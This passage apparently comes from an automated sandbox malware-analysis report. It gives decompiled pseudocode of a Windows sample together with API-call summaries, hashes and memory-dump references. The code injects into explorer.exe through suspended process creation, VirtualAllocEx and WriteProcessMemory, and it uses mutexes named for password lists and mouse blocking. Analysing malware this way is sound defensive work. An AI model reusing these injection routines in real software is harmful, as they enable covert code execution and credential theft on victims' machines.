						_t104 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
						__eflags = _t104;
						if(_t104 == 0) {
							_t210 =  *0x40d21c; // 0x40e8f0
							E004013A4(0, _t210);
							E00403738();
							E00403738();
							_t113 =  *0x40d21c; // 0x40e8f0
							CreateProcessA(E00401F48( *_t113), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
							E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
						}
					}
				} else {
					_t119 =  *0x40d21c; // 0x40e8f0
					E004047C4( *_t119, __ebx,  &_v100, __edi, _t236, _t241);
					E00401E94(_v100, "explorer.exe");
					if(_t241 != 0) {
						_t124 =  *0x40d21c; // 0x40e8f0
						__eflags = E004064DC( *_t124, __ebx,  &_v12, __edi, _t236, __eflags) - 1;
						if(__eflags != 0) {
							E00406294( &_v108, _t185, __edi, _t236, __eflags);
							_t129 =  *0x40d21c; // 0x40e8f0
							E00401B14(_t129, _v108);
						} else {
							E004063FC(_v12,  &_v104);
							_t159 =  *0x40d21c; // 0x40e8f0
							E00401B14(_t159, _v104);
						}
						E00403738();
						E00403738();
						_t137 =  *0x40d21c; // 0x40e8f0
						CreateProcessA(E00401F48( *_t137), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
						_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
					} else {
						_t161 =  *0x40d214; // 0x40e8f4
						if( *_t161 != 1) {
							_t163 = FindWindowA("shell_traywnd", 0); // executed
							GetWindowThreadProcessId(_t163,  &_v8);
							_t168 = E004040F4(OpenProcess(0x1f0fff, 0, _v8), _t166, _t194, _t236, __edi, _t236); // executed
							__eflags = _t168;
							if(_t168 != 0) {
								_t142 = 1;
							} else {
								E00403738();
								E00403738();
								CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v96,  &_v28); // executed
								_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236); // executed
							}
						} else {
							E00403738();
							E00403738();
							CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
							_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
						}
					}
					if(_t142 == 0) {
						_t221 =  *0x40d21c; // 0x40e8f0
						E004013A4(0, _t221);
						E00403738();
						E00403738();
						_t151 =  *0x40d21c; // 0x40e8f0
						CreateProcessA(E00401F48( *_t151), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
						E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
					}
				}
				_pop(_t201);
				 *[fs:eax] = _t201;
				_push(E0040B7AF);
				return E00401AE4( &_v116, 5);
			}






































                                    0x0040b3c0
                                    0x0040b3c0
                                    0x0040b3c0
                                    0x0040b3c6
                                    0x0040b3c7
                                    0x0040b3ca
                                    0x0040b3cd
                                    0x0040b3d0
                                    0x0040b3d3
                                    0x0040b3d6
                                    0x0040b3db
                                    0x0040b3dc
                                    0x0040b3e1
                                    0x0040b3e4
                                    0x0040b3e7
                                    0x0040b3f1
                                    0x0040b3f3
                                    0x0040b3f8
                                    0x0040b3fb
                                    0x0040b5fd
                                    0x0040b602
                                    0x0040b605
                                    0x0040b6dc
                                    0x0040b6e1
                                    0x0040b6e4
                                    0x0040b6e9
                                    0x0040b6eb
                                    0x0040b6f8
                                    0x0040b6fd
                                    0x0040b715
                                    0x0040b71c
                                    0x0040b71e
                                    0x0040b723
                                    0x0040b72a
                                    0x0040b72a
                                    0x0040b6fd
                                    0x0040b72f
                                    0x0040b735
                                    0x0040b737
                                    0x0040b744
                                    0x0040b751
                                    0x0040b76f
                                    0x0040b77c
                                    0x0040b788
                                    0x0040b60b
                                    0x0040b60e
                                    0x0040b616
                                    0x0040b61b
                                    0x0040b628
                                    0x0040b635
                                    0x0040b653
                                    0x0040b660
                                    0x0040b66c
                                    0x0040b671
                                    0x0040b673
                                    0x0040b679
                                    0x0040b681
                                    0x0040b68e
                                    0x0040b69b
                                    0x0040b6b9
                                    0x0040b6c6
                                    0x0040b6d2
                                    0x0040b6d2
                                    0x0040b673
                                    0x0040b401
                                    0x0040b404
                                    0x0040b40b
                                    0x0040b418
                                    0x0040b41d
                                    0x0040b502
                                    0x0040b50e
                                    0x0040b510
                                    0x0040b52f
                                    0x0040b537
                                    0x0040b53c
                                    0x0040b512
                                    0x0040b518
                                    0x0040b520
                                    0x0040b525
                                    0x0040b525
                                    0x0040b549
                                    0x0040b556
                                    0x0040b574
                                    0x0040b581
                                    0x0040b58d
                                    0x0040b423
                                    0x0040b423
                                    0x0040b42b
                                    0x0040b483
                                    0x0040b489
                                    0x0040b4a4
                                    0x0040b4a9
                                    0x0040b4ab
                                    0x0040b4f8
                                    0x0040b4ad
                                    0x0040b4b5
                                    0x0040b4c2
                                    0x0040b4e2
                                    0x0040b4ee
                                    0x0040b4ee
                                    0x0040b42d
                                    0x0040b435
                                    0x0040b442
                                    0x0040b462
                                    0x0040b46e
                                    0x0040b46e
                                    0x0040b42b
                                    0x0040b594
                                    0x0040b59a
                                    0x0040b5a2
                                    0x0040b5af
                                    0x0040b5bc
                                    0x0040b5da
                                    0x0040b5e7
                                    0x0040b5f3
                                    0x0040b5f3
                                    0x0040b594
                                    0x0040b78f
                                    0x0040b792
                                    0x0040b795
                                    0x0040b7a7

                                    APIs
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B462
                                      • Part of subcall function 004040F4: VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00404159
                                      • Part of subcall function 004040F4: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 0040416C
                                      • Part of subcall function 004040F4: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 00404186
                                      • Part of subcall function 004040F4: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 004041C8
                                    • FindWindowA.USER32(shell_traywnd,00000000), ref: 0040B483
                                    • GetWindowThreadProcessId.USER32(00000000,shell_traywnd), ref: 0040B489
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,shell_traywnd,00000000,?,00000000,0040B7A8), ref: 0040B499
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,001F0FFF,00000000,?,00000000,shell_traywnd,00000000), ref: 0040B4E2
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B581
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7F0,00000000,00000000,00000000,00000004), ref: 0040B5E7
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B660
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7F0,00000000,00000000,00000000,00000004), ref: 0040B6C6
                                      • Part of subcall function 004047C4: CharLowerA.USER32(?,00000000,00404839), ref: 00404802
                                    • ExitProcess.KERNEL32(00000000,00000000,0040B7A8), ref: 0040B72A
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B77C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Create$Virtual$AllocWindow$CharExitFindFreeLowerMemoryOpenThreadWrite
                                    • String ID: $@$explorer.exe$explorer.exe$open$shell_traywnd$@
                                    • API String ID: 3531647898-832551239
                                    • Opcode ID: c0ff7826fd6f996ef2014f0fe298170b6956a469b3a74fdcb78f6debc0ee12c8
                                    • Instruction ID: 1ef0f6496c909ed0c3779ef052ced8ab034a7c85da5a6e5c6a5d2eb73cd655db
                                    • Opcode Fuzzy Hash: c0ff7826fd6f996ef2014f0fe298170b6956a469b3a74fdcb78f6debc0ee12c8
                                    • Instruction Fuzzy Hash: 79B114B4B402086BD710EBE5CC42F9E77A9EB48704F50847BB600BB2D5D778E906979D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004040F4, Relevance: 6.1, APIs: 4, Instructions: 100memoryinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 70%
                                    			E004040F4(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				void* _v8;
				intOrPtr _v12;
				char _v13;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				intOrPtr _v36;
				long _v44;
				void* _v48;
				void* _t38;
				void* _t42;
				void* _t49;
				void* _t55;
				void* _t57;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t74;
				void* _t76;
				void* _t79;
				intOrPtr* _t80;

				_t80 = _t79 + 0xffffffd4;
				_v12 = __edx;
				_v8 = __eax;
				_t64 =  *0x4037bc; // 0x4037c0
				E0040242C( &_v48, _t64);
				_push(_t79);
				_push(0x404205);
				_push( *[fs:eax]);
				 *[fs:eax] = _t80;
				_v13 = 0;
				_push(0);
				_push(_v12);
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				_t74 =  *((intOrPtr*)(_v12 + 0x3c)) +  *_t80;
				_t76 = 0x10000000;
				do {
					_t76 = _t76 + 0x10000;
					_t38 = VirtualAlloc( *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40); // executed
					_t57 = _t38;
					if(_t57 != 0) {
						VirtualFree(_t57, 0, 0x8000); // executed
						_t55 = VirtualAllocEx(_v8,  *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40); // executed
						_t57 = _t55;
					}
				} while (_t57 == 0 && _t76 <= 0x30000000);
				E00403EC0(_v8, _t57, _v12, _t57, _t74, _t76,  &_v48); // executed
				_t42 = _v48;
				if(_t42 != 0) {
					_v24 = _t42;
					_v20 = _v36;
					WriteProcessMemory(_v8, _t57, _t42, _v44,  &_v28); // executed
					_t49 = E004038AC(_v8,  &_v24, E004040CC, 0, 8); // executed
					if(_t49 != 0) {
						_v13 = 1;
					}
				}
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(E0040420C);
				_t68 =  *0x4037bc; // 0x4037c0
				return E004024F0( &_v48, _t68);
			}
























                                    0x004040f7
                                    0x004040fd
                                    0x00404100
                                    0x00404106
                                    0x0040410c
                                    0x00404113
                                    0x00404114
                                    0x00404119
                                    0x0040411c
                                    0x0040411f
                                    0x00404128
                                    0x00404129
                                    0x00404130
                                    0x00404134
                                    0x0040413b
                                    0x0040413d
                                    0x00404142
                                    0x00404142
                                    0x00404159
                                    0x0040415e
                                    0x00404162
                                    0x0040416c
                                    0x00404186
                                    0x0040418b
                                    0x0040418b
                                    0x0040418d
                                    0x004041a5
                                    0x004041aa
                                    0x004041af
                                    0x004041b1
                                    0x004041b7
                                    0x004041c8
                                    0x004041dc
                                    0x004041e3
                                    0x004041e5
                                    0x004041e5
                                    0x004041e3
                                    0x004041eb
                                    0x004041ee
                                    0x004041f1
                                    0x004041f9
                                    0x00404204

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00404159
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 0040416C
                                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 00404186
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 004041C8
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$FreeMemoryProcessWrite
                                    • String ID:
                                    • API String ID: 2022580353-0
                                    • Opcode ID: 84d083e9ede9dc6036b816ade957f8df94457944a9d7dd1853b489bbe3e0cb9a
                                    • Instruction ID: f42078a2441a78766933d26432ea83b222ae1456efaef136c5ff68d4265ad9e9
                                    • Opcode Fuzzy Hash: 84d083e9ede9dc6036b816ade957f8df94457944a9d7dd1853b489bbe3e0cb9a
                                    • Instruction Fuzzy Hash: 4C3112B1A00205ABD710DB99CD85F9EB7FDAB88704F54847AF604F7381D674EE048BA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403789, Relevance: 3.1, APIs: 2, Instructions: 85memoryinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 69%
                                    			E00403789(void* __eax, void* __ebx, signed int __ecx, signed char __edx, signed char* __edi, void* __esi) {
				signed char _t26;
				void* _t32;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t46;
				signed int _t49;
				signed char _t55;
				intOrPtr _t58;
				void* _t60;
				signed char* _t61;
				void* _t65;
				signed int _t66;
				intOrPtr _t67;

				_t61 = __edi;
				_t55 = __edx;
				_t49 = __ecx;
				_t48 = __ebx;
				asm("aaa");
				 *__ecx =  *__ecx + __edx;
				_t26 = __eax + 0x00000001 | 0x00000054;
				_push(__ebx);
				if(_t26 == 0) {
					_push( *[fs:eax]);
					 *[fs:eax] = _t67;
					E00401CAC(_t65 - 8, __ebx);
					_t32 = VirtualAllocEx(__esi, 0, E00401D50( *((intOrPtr*)(_t65 - 8))) + 1, 0x3000, 0x40); // executed
					E00401CAC(_t65 - 0xc, __ebx);
					WriteProcessMemory(__esi, _t32, __ebx, E00401D50( *((intOrPtr*)(_t65 - 0xc))) + 1, _t65 - 4); // executed
					_pop(_t58);
					 *[fs:eax] = _t58;
					_push(E00403871);
					return E00401AE4(_t65 - 0xc, 2);
				} else {
					_t66 =  *(__esi + 0x67) * 0x61727241;
					if(_t66 < 0) {
						 *_t26 =  *_t26 + _t26;
						 *((intOrPtr*)(_t26 + __edx)) =  *((intOrPtr*)(_t26 + __edx)) + __edx;
					}
					asm("adc [eax], al");
					_t43 = _t26 - 1;
					 *_t43 =  *_t43 + _t43;
					 *((intOrPtr*)(_t43 + _t55)) =  *((intOrPtr*)(_t43 + _t55)) + _t55;
					 *_t49 =  *_t49 + _t55;
					_push(_t66);
					asm("outsb");
					asm("aaa");
					_t45 = _t43 + 2;
					 *( *(_t49 + 0x6e + _t49 * 2) * 0x7463656a) =  *( *(_t49 + 0x6e + _t49 * 2) * 0x7463656a) + _t49;
					 *( *(_t55 + 0x72) * 0xc0797261 + 0x69 + _t49 * 2) =  *( *(_t55 + 0x72) * 0xc0797261 + 0x69 + _t49 * 2) | _t55;
					asm("bound ecx, [ecx+0x6e]");
					asm("outsw");
					asm("adc al, 0x0");
					 *_t45 =  *_t45 + _t45;
					 *_t45 =  *_t45 + _t45;
					 *_t45 =  *_t45 + _t45;
					 *_t61 = _t55;
					_t46 = _t45 + 1;
					 *_t46 =  *_t46 + _t55;
					 *_t46 =  *_t46 + _t46;
					 *((intOrPtr*)(_t48 + 0x42d233c0)) =  *((intOrPtr*)(_t48 + 0x42d233c0)) + _t49;
					_t60 = 0;
					do {
						_t60 = _t60 + 1;
					} while ( *((char*)(_t46 + _t60 - 1)) != 0xc3);
					return _t60;
				}
			}
















                                    0x00403789
                                    0x00403789
                                    0x00403789
                                    0x00403789
                                    0x00403789
                                    0x0040378b
                                    0x0040378d
                                    0x0040378f
                                    0x00403790
                                    0x00403804
                                    0x00403807
                                    0x00403816
                                    0x00403828
                                    0x00403838
                                    0x0040384a
                                    0x00403851
                                    0x00403854
                                    0x00403857
                                    0x00403869
                                    0x00403792
                                    0x00403792
                                    0x00403799
                                    0x0040379b
                                    0x0040379d
                                    0x0040379d
                                    0x0040379f
                                    0x004037a2
                                    0x004037a3
                                    0x004037a5
                                    0x004037a9
                                    0x004037ab
                                    0x004037ac
                                    0x004037bd
                                    0x004037be
                                    0x004037bf
                                    0x004037c1
                                    0x004037c5
                                    0x004037c8
                                    0x004037ca
                                    0x004037cc
                                    0x004037ce
                                    0x004037d0
                                    0x004037d2
                                    0x004037d4
                                    0x004037d5
                                    0x004037d7
                                    0x004037d9
                                    0x004037dc
                                    0x004037de
                                    0x004037de
                                    0x004037e4
                                    0x004037eb
                                    0x004037eb

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: f0bdd6dffcd38e97630dd65025443de6d4de875a0db27301e0117961d2cab211
                                    • Instruction ID: 0c617441959cbc84cdace3d6f91086d90079d183bae557b442fb7b10ecf1da84
                                    • Opcode Fuzzy Hash: f0bdd6dffcd38e97630dd65025443de6d4de875a0db27301e0117961d2cab211
                                    • Instruction Fuzzy Hash: 2921D23050E3C11FD7039B7088529997FA8EB47314B5940FBE081AB1E3C67C9A06C72A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004037EC, Relevance: 3.1, APIs: 2, Instructions: 51memoryinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 41%
                                    			E004037EC(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				long _v8;
				char _v12;
				char _v16;
				void* _t14;
				void* _t26;
				intOrPtr _t33;
				void* _t38;
				intOrPtr _t41;

				_push(0);
				_push(0);
				_push(0);
				_t26 = __edx;
				_t38 = __eax;
				_push(_t41);
				_push(0x40386a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				E00401CAC( &_v12, __edx);
				_t14 = VirtualAllocEx(_t38, 0, E00401D50(_v12) + 1, 0x3000, 0x40); // executed
				E00401CAC( &_v16, _t26);
				WriteProcessMemory(_t38, _t14, _t26, E00401D50(_v16) + 1,  &_v8); // executed
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E00403871);
				return E00401AE4( &_v16, 2);
			}











                                    0x004037ef
                                    0x004037f1
                                    0x004037f3
                                    0x004037f8
                                    0x004037fa
                                    0x004037fe
                                    0x004037ff
                                    0x00403804
                                    0x00403807
                                    0x00403816
                                    0x00403828
                                    0x00403838
                                    0x0040384a
                                    0x00403851
                                    0x00403854
                                    0x00403857
                                    0x00403869

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: 3d11060167eeff0d333754bde7cf52b815637146b18d6ef34f71e39cc8c7fece
                                    • Instruction ID: 1ce7357d57a470de8e11aa6f3e94a258910408ab5c4fbe8ac5f974eefb294d6d
                                    • Opcode Fuzzy Hash: 3d11060167eeff0d333754bde7cf52b815637146b18d6ef34f71e39cc8c7fece
                                    • Instruction Fuzzy Hash: 0901A7356402047FE711AA628C42FAFBBACDB45744F614477F901F22D2D97CAE01856C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405D04, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E00405D04(char __eax, void* __ebx, void* __eflags) {
				char _v8;
				struct _WIN32_FIND_DATAA _v328;
				void* _t13;
				intOrPtr _t23;
				void* _t26;

				_v8 = __eax;
				E00401F38(_v8);
				_push(_t26);
				_push(0x405d61);
				_push( *[fs:eax]);
				 *[fs:eax] = _t26 + 0xfffffebc;
				_t13 = FindFirstFileA(E00401F48(_v8),  &_v328); // executed
				if(_t13 != 0xffffffff) {
					FindClose(_t13);
				}
				_pop(_t23);
				 *[fs:eax] = _t23;
				_push(E00405D68);
				return E00401AC0( &_v8);
			}








                                    0x00405d0e
                                    0x00405d14
                                    0x00405d1b
                                    0x00405d1c
                                    0x00405d21
                                    0x00405d24
                                    0x00405d39
                                    0x00405d41
                                    0x00405d44
                                    0x00405d49
                                    0x00405d4d
                                    0x00405d50
                                    0x00405d53
                                    0x00405d60

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D39
                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D44
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: dcdab070d271b41a397ac8b5c721f9a764d64cac29a79a814ec76c1e737da3ad
                                    • Instruction ID: ef45179a0415a0f0738613dd19991e6189ea7b224224af70f6e9243e4b919f09
                                    • Opcode Fuzzy Hash: dcdab070d271b41a397ac8b5c721f9a764d64cac29a79a814ec76c1e737da3ad
                                    • Instruction Fuzzy Hash: CAF08270604604AFCB11EBB9CD5698F77ECDB453147A049BBF404F22E1E73C9E009A18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040387C, Relevance: 3.0, APIs: 2, Instructions: 28memoryinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 84%
                                    			E0040387C(void* __eax, long __ecx, void* __edx) {
				void* _t2;
				void* _t5;
				void* _t9;
				long _t10;
				void* _t11;
				SIZE_T* _t12;

				_push(__ecx);
				_t10 = __ecx;
				_t11 = __edx;
				_t5 = __eax;
				_t2 = VirtualAllocEx(__eax, 0, __ecx, 0x3000, 0x40); // executed
				_t9 = _t2;
				WriteProcessMemory(_t5, _t9, _t11, _t10, _t12); // executed
				return _t9;
			}









                                    0x00403880
                                    0x00403881
                                    0x00403883
                                    0x00403885
                                    0x00403892
                                    0x00403897
                                    0x0040389e
                                    0x004038aa

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 00403892
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 0040389E
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: 44b08b0c31ed70faa86a56c95f5dcbe8ec638da3a1b73dcacbf25ce5a432df3e
                                    • Instruction ID: be37be616b4aec00b4a8009f52dfb0ce1374bdb392ffd0e09f2bb002aa04c1fa
                                    • Opcode Fuzzy Hash: 44b08b0c31ed70faa86a56c95f5dcbe8ec638da3a1b73dcacbf25ce5a432df3e
                                    • Instruction Fuzzy Hash: 9FD05EA234621437E134216B6C46FB71E4CCBC7BF6E11053AB708E628294A69C0141F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040BBF4, Relevance: 73.8, APIs: 30, Strings: 12, Instructions: 333sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 84%
                                    			E0040BBF4(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				void* _t49;
				void* _t52;
				long _t53;
				void* _t55;
				intOrPtr* _t65;
				void* _t68;
				long _t69;
				char* _t80;
				intOrPtr* _t93;
				long _t97;
				intOrPtr* _t100;
				long _t104;
				intOrPtr* _t107;
				long _t111;
				struct HINSTANCE__* _t114;
				struct HINSTANCE__* _t117;
				void* _t120;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t216;
				void* _t217;
				void* _t218;
				void* _t219;
				void* _t220;
				void* _t221;
				void* _t222;
				intOrPtr _t229;
				void* _t254;
				void* _t255;
				intOrPtr _t257;
				intOrPtr _t258;
				void* _t270;

				_t255 = __esi;
				_t254 = __edi;
				_t257 = _t258;
				_t213 = 0xb;
				do {
					_push(0);
					_push(0);
					_t213 = _t213 - 1;
				} while (_t213 != 0);
				E00403418(0x40bb04);
				_push(_t257);
				_push(0x40c0c4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t258;
				_t49 = E00403568(0, 0, "_x_X_UPDATE_X_x_"); // executed
				_t209 = _t49;
				if(GetLastError() != 0xb7) {
					CloseHandle(_t209); // executed
				} else {
					CloseHandle(_t209);
					Sleep(0x2ee0);
				}
				_t52 = E00403568(0, 0, "_x_X_PASSWORDLIST_X_x_"); // executed
				_t210 = _t52;
				_t53 = GetLastError();
				_t261 = _t53 - 0xb7;
				if(_t53 != 0xb7) {
					CloseHandle(_t210);
					_t55 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_"); // executed
					_t211 = _t55;
					__eflags = GetLastError() - 0xb7;
					if(__eflags != 0) {
						CloseHandle(_t211);
						L26:
						E004013A4(1,  &_v80);
						_t225 = "Restart";
						E00401E94(_v80, "Restart");
						if(__eflags != 0) {
							Sleep(0x3e8); // executed
						}
						E00404604(_t213, __eflags);
						E0040491C();
						E0040B118(_t225, _t254, _t255);
						_t65 =  *0x40d204; // 0x40e8f8
						_t68 = E00403568(0, 0, E00401F48( *_t65)); // executed
						_t212 = _t68;
						_t69 = GetLastError();
						__eflags = _t69 - 0xb7;
						if(_t69 != 0xb7) {
							CloseHandle(_t212); // executed
						} else {
							CloseHandle(_t212);
							Sleep(0x3e8);
							_t93 =  *0x40d204; // 0x40e8f8
							_t212 = E00403568(0, 0, E00401F48( *_t93));
							_t97 = GetLastError();
							__eflags = _t97 - 0xb7;
							if(_t97 != 0xb7) {
								CloseHandle(_t212);
							} else {
								CloseHandle(_t212);
								Sleep(0x3e8);
								_t100 =  *0x40d204; // 0x40e8f8
								_t212 = E00403568(0, 0, E00401F48( *_t100));
								_t104 = GetLastError();
								__eflags = _t104 - 0xb7;
								if(_t104 != 0xb7) {
